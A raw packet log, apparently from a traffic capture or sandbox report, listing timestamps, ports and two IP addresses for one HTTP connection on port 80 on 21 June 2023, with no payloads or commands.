Jun 21, 2023 04:27:39.184041023 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.184072971 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.184120893 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.184137106 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.184168100 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.184226036 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.184305906 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.184626102 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.184675932 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.184722900 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.184994936 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.185548067 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.185623884 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.326793909 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.326860905 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.326917887 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.327069998 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.327622890 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.327675104 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.327728987 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.327796936 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.327819109 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.327871084 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.327913046 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.328023911 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.328540087 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.328587055 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.328630924 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.328675032 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.328711033 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.328800917 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.329552889 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.329597950 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.329833031 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.336637974 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.336699009 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.336745977 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.336792946 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.336863995 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.336898088 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.337677956 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.337728024 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.337771893 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.337816954 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.337867022 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.337898016 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.337898016 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.338637114 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.338725090 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.338772058 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.338813066 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.338816881 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.338943005 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.339768887 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.339819908 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.339867115 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.339910984 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.339958906 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.339962959 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.339962959 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.340301991 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.348747969 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.348814011 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.348865032 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.348912954 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.348958015 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.348962069 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.349005938 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.349020004 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.349055052 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.349102020 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.349157095 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.349178076 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.349224091 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.349271059 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.349312067 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.349313021 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.349314928 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.349364042 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.349411964 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.349414110 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.349461079 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.349502087 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.349508047 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.349556923 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.349603891 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.349631071 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.349971056 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.468655109 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.468691111 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.468718052 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.468746901 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.468775034 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.469073057 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.477626085 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.477668047 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.477696896 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.477724075 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.477754116 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.477817059 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.477859020 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.478480101 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.478538036 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.478559971 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.478595972 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.478657961 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.478657961 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.479669094 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.479696989 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.479718924 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.479738951 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.479759932 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.479815006 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.479815006 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.488615036 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.488643885 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.488663912 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.488683939 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.488703012 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.488734961 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.488755941 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.488776922 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.488797903 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.488818884 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.488838911 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.488857985 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.488862038 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.488857985 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.488857985 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.488884926 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.488907099 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.488922119 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.488941908 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.488962889 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.488984108 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.488997936 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.488997936 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.488997936 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.489006042 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.489027023 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.489043951 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.489049911 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.489072084 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.489073038 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.489094019 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.489137888 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.489221096 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.489567041 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.489589930 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.489630938 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.489732981 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.489746094 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.489871979 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.490578890 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.490607977 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.490628004 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.490648031 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.490689039 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.490784883 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.603673935 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.603737116 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.603785992 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.603827953 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.603832006 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.603980064 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.604629040 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.604681969 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.604728937 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.604777098 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.604823112 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.604873896 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.604873896 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.605561972 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.605612040 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.605659008 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.605705023 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.605937958 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.606400013 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.608736038 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.613682985 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.613774061 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.613827944 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.613878965 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.613881111 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.614150047 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.614557981 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.630826950 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.630897999 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.630947113 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.630994081 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.631072044 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.631628990 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.631715059 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.631762981 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.631808996 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.631831884 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.632123947 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.632700920 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.632751942 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.632797003 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.632846117 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.632894039 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.632900000 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.632900000 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.633610964 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.633661032 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.633709908 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.633758068 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.633914948 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.633914948 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.634620905 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.634670019 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.634717941 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.634764910 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.634809017 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.634896040 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.635521889 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.635569096 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.635616064 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.635658979 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.635679007 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.635762930 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.636600018 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.636648893 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.636694908 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.636743069 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.636749029 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.637415886 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.637651920 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.639095068 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.739799976 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.739870071 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.739926100 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.739973068 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.739980936 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.741295099 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.748712063 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.748780012 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.748833895 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.748881102 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.748935938 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.748984098 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.749032021 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.749082088 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.749129057 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.749176979 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.749334097 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.749334097 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.749644041 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.749691010 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.749736071 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.749780893 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.750540018 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.750586033 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.750607967 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.752907038 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.766674995 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.766740084 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.766788960 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.766839027 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.766885042 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.767098904 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.767669916 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.767719984 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.767767906 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.767813921 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.767817974 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.767862082 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.767966032 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.768661976 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.768714905 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.768760920 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.768809080 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.768899918 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.768899918 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.769577980 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.769685030 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.769715071 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.769804001 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.769849062 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.769872904 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.769898891 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.769969940 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.770704031 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.770755053 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.770800114 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.770837069 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.770848989 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.770924091 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.771648884 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.771699905 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.771745920 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.771773100 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.771795988 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.771862030 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.772583961 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.772635937 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.772684097 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.772725105 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.772731066 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.772808075 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.773653984 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.773705006 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.773751020 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.773799896 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.773845911 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.773859978 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.773929119 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.774678946 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.774725914 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.774771929 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.774791002 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.774818897 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.774862051 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.774880886 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.774972916 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.775573015 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.775636911 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.775685072 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.775731087 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.775752068 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.775813103 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.776628017 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.776675940 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.776722908 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.776771069 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.776789904 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.776859999 CEST	49701	80	192.168.2.3	37.34.248.24
Jun 21, 2023 04:27:39.777750015 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.777797937 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.777844906 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.777894020 CEST	80	49701	37.34.248.24	192.168.2.3
Jun 21, 2023 04:27:39.777908087 CEST	49701	80	192.168.2.3	37.34.248.24
